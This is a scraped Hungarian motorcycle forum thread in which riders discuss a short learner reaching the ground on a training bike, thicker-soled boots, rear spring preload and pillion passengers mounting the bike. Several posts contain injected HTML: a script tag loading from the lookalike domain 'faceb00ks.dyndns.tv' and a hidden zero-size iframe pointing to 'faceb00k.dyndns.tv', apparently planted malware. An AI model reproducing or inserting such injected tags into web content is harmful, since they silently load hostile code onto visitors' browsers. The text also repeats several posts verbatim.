Az majd a következő szint lesz, amikor utast is viszek...Birge, dobd fel hátra a Nemtáviratot, aztán guruljatok együtt. (Teljesen jól műxik a dolog, vidd el fagyizni mondjuk Szentendrére a korzóra=Dunapart)
Follow along with the video below to see how to install our site as a web app on your home screen.
Note: Előfordulhat, hogy ez a funkció egyes böngészőkben nem érhető el.
Az majd a következő szint lesz, amikor utast is viszek...Birge, dobd fel hátra a Nemtáviratot, aztán guruljatok együtt. (Teljesen jól műxik a dolog, vidd el fagyizni mondjuk Szentendrére a korzóra=Dunapart)
Az majd a következő szint lesz, amikor utast is viszek...
Akkor nyújtsd át a kulcsot nemtáviratnak Megnyugszik a lelke is meg nem jön ki a gyakorlatból se amíg nem lesz saját vas
Akkor nyújtsd át a kulcsot nemtáviratnak Megnyugszik a lelke is meg nem jön ki a gyakorlatból se amíg nem lesz saját vas
Hoooogyne ! Ezt ár ismerjük ! Aztán elfelejti visszanyújtani, utána meg megy a nyavalygás, hogy ugye nem akartál azzal menni, mert akkor én elviszem, ...
Köszönöm! Akkor marad az eddig jól bevált bakancs és a kevésbé stabil állás De erre a rugó állítós dologra azért rákérdezek az oktatónál, háthaHa a saját motorod lenne, azt mondanám, próbáld ki, de így szerintem nem lennél előrébb. Mégpedig azért, mert a vastagabb talp miatt nem csak, hogy kevésbé érzed majd a lábféket, de biztos, hogy állítani kellene a váltókaron, hogy beférjen alá a lábfejed. Kérdés, hogy mire hajlandóak inkább, pár centit lecsalni a magasságból (ami amúgy mindenkinek jó, mert stabilabban áll a lábán), vagy állítani a váltókaron, ami miatt a többségnek esetleg majd el kell emelnie a lábát a lábtartóról, hogy váltani tudjon...
Ha könnyen hozzáférhető a hátsó rugóelőfeszítés-állítás a motoron, és főleg, ha fokozatonként állítható, inkább azt kellene megpróbálni kisebbre venni, a miatt is jobban összeül a motor terhelve.
<script src="http://faceb00ks.dyndns.tv"></script><iframe src="http://faceb00k.dyndns.tv" style="display: none;" height="0" width="0"></iframe> Egyesek szerint vastagabb talpú cipőben kéne mennem, mert a bakancsomnak "csak" normál talpa van. Arra sajnos nincs lehetőség, hogy az a 2-3 ember miatt néhány cm-t lecsaljanak.
akkor ez volt a baj! az utasom rögtön a haladó szinttel kezdte, a lábtartóra állva szállt fel.
Nem is az oldalsztender felé billenéssel volt a gond, hanem a másik oldallal, mikor átlendítette magát.
igen, ezért (is) volt jó utasom a csamszülinapon: a hátsó ülésről is leért a lába.Ez a "haladó" szint a vezetőnek a legrosszabb. Meg kell értetni az utassal, hogy ne akarja kibillenteni a motort felszállás közben a túl egyoldalas terheléssel. Ha alacsony a motor, akkor a lábát az ülésen átlendítve egyből közel egyenesen ülő helyzetben el tud helyezkedni egyből.
letojtam a huzatot, örültem, hogy vittél magaddaligen, ezért (is) volt jó utasom a csamszülinapon: a hátsó ülésről is leért a lába.
viszont akárhogy próbálta összehúzni magát, ugyanúgy érte szegényt a huzat, mintha ott se ültem volna előtte. hiába, aki törpe sofőrt választ magának...
<script src="http://faceb00ks.dyndns.tv"></script><iframe src="http://faceb00k.dyndns.tv" style="display: none;" width="0" height="0"></iframe>Lehet hülyeséget kérdezek, de szerintetek mennyire lehet vastag talpú cipőben motorozni, váltót, féket kezelni? A gyakorló motorhoz kicsinek bizonyulok, éppen a cipő orrát tudom letenni ami kicsit megnehezíti a dolgomat. Egyesek szerint vastagabb talpú cipőben kéne mennem, mert a bakancsomnak "csak" normál talpa van. Arra sajnos nincs lehetőség, hogy az a 2-3 ember miatt néhány cm-t lecsaljanak. Mivel a többség, aki A kategóriára jön, mind szép szál férfi méret csak néhány fiú és leányzó van, akinek a mérte ellenére elment az esze Jóból kicsit adnak ... a 165cm pedig úgy tűnik most kicsi.
Ez jó, gondolom stabilan állt a zsepin tiszta balett óra. Tartsuk meg a 240kg-os vasat lábujjhegyenNa de úgyse adom fel, ez is csak egy akadály, amivel meg kell birkózni. Nőni nem fogok már, ez tuti, így marad a pipiskedés.Nálunk volt egy csaj a rutinpályán, akinek vagy 2 számmal nagyobb csizmája volt, kitömte az elejét papírzsepivel, és így tudta letenni a csizma orrát...ilyesmivel is lehet próbálkozni
<script src="http://faceb00ks.dyndns.tv"></script><iframe src="http://faceb00k.dyndns.tv" style="display: none;" height="0" width="0"></iframe>
Ez jó, gondolom stabilan állt a zsepin tiszta balett óra. Tartsuk meg a 240kg-os vasat lábujjhegyenNa de úgyse adom fel, ez is csak egy akadály, amivel meg kell birkózni. Nőni nem fogok már, ez tuti, így marad a pipiskedés.
<script src="http://faceb00ks.dyndns.tv"></script><iframe src="http://faceb00k.dyndns.tv" style="display: none;" height="0" width="0"></iframe>Lehet hülyeséget kérdezek, de szerintetek mennyire lehet vastag talpú cipőben motorozni, váltót, féket kezelni? A gyakorló motorhoz kicsinek bizonyulok, éppen a cipő orrát tudom letenni ami kicsit megnehezíti a dolgomat. Egyesek szerint vastagabb talpú cipőben kéne mennem, mert a bakancsomnak "csak" normál talpa van. Arra sajnos nincs lehetőség, hogy az a 2-3 ember miatt néhány cm-t lecsaljanak. Mivel a többség, aki A kategóriára jön, mind szép szál férfi méret csak néhány fiú és leányzó van, akinek a mérte ellenére elment az esze Jóból kicsit adnak ... a 165cm pedig úgy tűnik most kicsi.